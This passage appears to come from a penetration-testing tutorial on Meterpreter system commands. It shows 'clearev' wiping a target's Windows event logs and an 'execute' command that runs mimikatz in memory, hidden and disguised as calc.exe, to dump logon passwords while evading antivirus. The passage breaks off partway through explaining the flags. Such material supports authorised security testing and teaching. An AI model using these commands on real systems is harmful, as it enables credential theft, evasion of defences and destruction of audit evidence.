Understanding the Meterpreter system commands
Meterpreter system commands allow you to access system-specific commands without dropping to a shell session.
How to do it...
clearev
clears theApplication
,System
, andSecurity
logs on the target system:
meterpreter > clearev [*] Wiping 525 records from Application... [*] Wiping 1916 records from System... [*] Wiping 1565 records from Security...
- The
execute
command executes a command on the target. The awesome thing about theexecute
command is that it allows us to run commands from memory without uploading the binary to the target, this way effectively bypassing several antivirus products.
In the next example, I will show you how to run mimikatz
directly in memory. The command I will use is the following:
execute -H -i -c -m -d calc.exe -f /usr/share/mimikatz/x64/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
From the preceding command:
-H
hides the process-i
allows us to interact with the process after we create it-c
channels the I/O...